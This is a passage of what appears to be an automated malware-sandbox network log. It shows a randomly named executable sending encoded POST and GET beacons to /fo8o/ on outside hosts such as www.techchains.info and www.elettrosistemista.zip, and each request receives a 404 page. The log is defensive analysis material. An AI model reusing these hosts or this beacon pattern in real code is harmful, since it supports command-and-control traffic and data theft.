                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 74 71 7a 62 69 56 74 64 67 41 4d 61 68 6b 63 31 58 46 58 6a 46 4e 53 73 7a 55 6d 75 62 7a 39 48 6b 53 50 39 73 4e 6b 41 59 54 57
                                                                                      Data Ascii: U6YDsxW=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXItqzbiVtdgAMahkc1XFXjFNSszUmubz9HkSP9sNkAYTW
                                                                                      Dec 2, 2024 14:33:42.987880945 CET637INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:33:42 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.65002566.29.149.46806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:33:44.402884960 CET813OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.techchains.info
                                                                                      Origin: http://www.techchains.info
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 236
                                                                                      Referer: http://www.techchains.info/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 74 51 73 78 4d 55 75 37 7a 58 46 6b 71 50 76 37 42 44 50 73 32 31 61 64 53 4f 32 35 32 66 72 47 63 45 4c 57 46 53 66 35 61 59 71 77 3d 3d
                                                                                      Data Ascii: U6YDsxW=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtQsxMUu7zXFkqPv7BDPs21adSO252frGcELWFSf5aYqw==
                                                                                      Dec 2, 2024 14:33:45.638147116 CET637INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:33:45 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.65002666.29.149.46806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:33:47.059653997 CET1826OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.techchains.info
                                                                                      Origin: http://www.techchains.info
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.techchains.info/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 30 5a 31 79 31 4d 79 36 68 4d 2f 74 4e 50 62 42 6b 57 4b 67 36 6b 30 57 39 43 68 53 39 58 52 2b 37 33 2f 71 56 59 78 49 79 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4c 47 41 37 30 34 44 55 69 68 38 49 33 67 74 6f 6b 32 42 34 6b 32 2b 74 4d 6e 77 59 73 75 2b 63 50 71 48 46 67 57 37 55 4a 4c 63 46 50 73 32 4a 52 65 73 48 2f 41 6f 64 63 65 67 61 43 4e 37 68 68 6f 75 43 35 5a 70 4a 45 73 48 45 69 58 37 [TRUNCATED]
                                                                                      Data Ascii: U6YDsxW=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8Fx0Z1y1My6hM/tNPbBkWKg6k0W9ChS9XR+73/qVYxIy0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vLGA704DUih8I3gtok2B4k2+tMnwYsu+cPqHFgW7UJLcFPs2JResH/AodcegaCN7hhouC5ZpJEsHEiX7cgW7zuI60JeSi7X7an0pH15nEFNZASgOVRwKFkrNaE1wyZPPVcoETqEHFkiwQyoFxywvqC0x98C7vphzvMl4UgECr9egoFU931MrywlRSAvRkl0e8P11lRLj7GV76LpQF0Pibup/5EyCNfcqy3KyNvNQlrDySsuHSTnzn35//5EHg1Id9+xzb3N84ccRPci1sr11Sz1pxot0S1pzvIHPROmGpe/8E0AaJDSwmVzRef/T9hjapGA6qGEEDpeKNE5ez26JQFhPh5i9e+fT3yM9O8mqm12VMElzf+AfzUE530juFIlx6+dECOKyNlB2PpiPuOQi6iQXCgjxsCMuQyXyVkr33be3+V8yLwPjwsZ289Nr/FmWE4+zL/YgH9bJtGFY0u0sdyjWxeNX8j8mvAVJ97iJRUthMq3ithoqoWSmVpgo9LFAiXV+3ATFfTUp3M/ORdIL9W5HMEMYRQdrBC4xm7TOamhSpoJEOTq0vwLGb6ca/n8JXcuO0IG5Q6M4u4aa46BD16QyGPHviBQfNYSnFlpqI45i3PHCfdSuQdg89HWvbTyICgg/Zx6i5NjktnT7vfwIJ4eVtFbR6uYzM2Ytvr74YSLms1pfePUvoLxo0pFFKtcZXCBBCKQHqbVOEjBevjoA8SSOXD4v/RgXxjFG4JN1IW4EJ+TWbx [TRUNCATED]
                                                                                      Dec 2, 2024 14:33:48.333792925 CET637INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:33:48 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.65002766.29.149.46806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:33:49.715419054 CET526OUTGET /fo8o/?U6YDsxW=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&cPm=bL-XkPyPkF HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.techchains.info
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 2, 2024 14:33:50.947177887 CET652INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:33:50 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.650030195.110.124.133806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:33:57.091831923 CET807OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 212
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 69 31 55 77 34 49 32 58 75 43 48 37 6d 35 73 61 4e 51 5a 43 68 4c 45 2b 49 67 42 52 2f 6d 6a 2f 4a 7a 78 62 66 34 49 6f 66 65 4f
                                                                                      Data Ascii: U6YDsxW=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCii1Uw4I2XuCH7m5saNQZChLE+IgBR/mj/Jzxbf4IofeO
                                                                                      Dec 2, 2024 14:33:58.445168972 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:33:58 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.650031195.110.124.133806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:33:59.747895002 CET831OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 236
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 47 2b 4b 34 7a 52 66 6d 4a 39 4a 4c 78 4a 49 30 76 6e 72 37 74 6d 63 54 68 61 35 54 4d 6d 2f 61 58 70 78 52 76 58 56 35 58 67 67 3d 3d
                                                                                      Data Ascii: U6YDsxW=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxrG+K4zRfmJ9JLxJI0vnr7tmcTha5TMm/aXpxRvXV5Xgg==
                                                                                      Dec 2, 2024 14:34:01.055336952 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:34:00 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.650032195.110.124.133806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:34:02.403425932 CET1844OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
